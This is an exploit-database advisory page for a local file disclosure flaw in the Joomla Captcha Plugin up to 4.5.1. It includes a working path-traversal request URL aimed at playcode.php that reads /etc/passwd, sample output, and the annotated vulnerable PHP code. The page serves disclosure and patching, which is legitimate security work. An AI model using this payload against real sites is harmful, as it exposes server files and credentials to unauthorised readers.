Joomla Captcha Plugin - exploit.company

vendor:

Joomla Captcha Plugin

by:

dun

N/A

CVSS

MEDIUM

Local File Disclosure

CWE

Product Name: Joomla Captcha Plugin

Affected Version From: Up to version 4.5.1

Affected Version To: Up to version 4.5.1

Patch Exists: YES

Related CWE: Not provided

CPE: Not provided

Metasploit:

Other Scripts:

Platforms Tested: Not provided

Not provided

Joomla Captcha Plugin <= 4.5.1 Local File Disclosure Vulnerability

The Joomla Captcha Plugin <= 4.5.1 is vulnerable to a local file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the 'playcode.php' file. By manipulating the 'lng' parameter in the request, an attacker can disclose the contents of arbitrary files on the server, such as the '/etc/passwd' file.

Mitigation:

Update to the latest version of the Joomla Captcha Plugin.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM
 
   [ Discovered by dun \ posdub[at]gmail.com ]

 #############################################################################
 #  [ Joomla Captcha Plugin <= 4.5.1 ]  Local File Disclosure Vulnerability  #
 #############################################################################
 #
 # Script: "Joomla Captcha plugin and patch for Joomla!"
 #
 # Script site: http://www.kupala.net/
 # Download: http://code.google.com/p/joomla15captcha/
 #
 # 
 # [LFI] (magic_quotes_gpc = Off)
 # Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
 #       dun@radius ~ $ cat joomlacaptcha.mp3
 #       root:x:0:0:root:/root:/bin/bash
 #       ......
 # 
 # File: ./plugins/system/captcha/playcode.php
 # 
 #     79	if (!$captchacode) $captchacode = '0000000000';									
 #     80	
 #     81	session_write_close();
 #     82	
 #     83	@$lng = $_GET['lng'];                                                 // [1]
 #     84	if ( !$lng ) $lng = 'en-gb';
 #     85	
 #     86	$captchafilename = "joomlacaptcha.mp3";
 #     87	$captchalength = strlen( $captchacode );
 #     88	
 #     89	$outlength = 0;
 #     90	$reallength = 0;
 #     91	$currsize = 0;
 #     92	$outstream = '';
 #     93	
 #     94	if ($captchalength > 0) {
 #     95		for ($i = 0; $i < $captchalength; $i++) {
 #     96			$soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3';   // [2]
 #     97		}
 #     98		foreach ($soundfiles as $onefile){                                     // 
 #     99			if (file_exists( $onefile )) {                                 // 
 #    100				$instream = fopen( $onefile, 'rb' );                   // 
 #    101				$currsize = filesize( $onefile );                      // [3]
 #    102				$outstream .= fread( $instream, $currsize );           // 
 #    103				$outlength += $currsize;                               // 
 #    104				fclose( $instream );                                   // 
 #    105				$reallength += 1;                                      // 
 #    106			}
 #    107		}
 #    108	}
 #    109	
 #    110	if (($outstream == '') || ($captchalength != $reallength)) {
 #    111			$outstream = 0; $outlength = 1;
 #    112	}
 #    113	
 #    114	ob_start();
 #    115	header( 'Content-Type: audio/x-mpeg');                                         //
 #    116	header( "Content-Disposition: attachment; filename=$captchafilename;");        //
 #    117	header( 'Content-Transfer-Encoding: binary');                                  //
 #    118	header( 'Content-Length: '.$outlength);                                        //
 #    119	echo $outstream ;                                                              // [4] LFD
 #    120	ob_end_flush();
 # 
 # 
 # [ dun / 2011-01-09 ]